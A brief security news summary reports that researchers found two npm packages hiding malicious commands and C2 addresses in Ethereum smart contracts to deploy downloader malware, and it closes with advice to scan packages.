ReversingLabs uncovered two npm packages, colortoolsv2 and mimelib2, that leverage Ethereum smart contracts to hide malicious commands, deploying downloader malware. Part of a broader npm/GitHub campaign using social engineering to trick developers, the technique embeds C2 server URLs in contracts for stealth. This raises risks for crypto software. Experts urge scanning packages for threats and using tools like Spectra Assure Community for protection.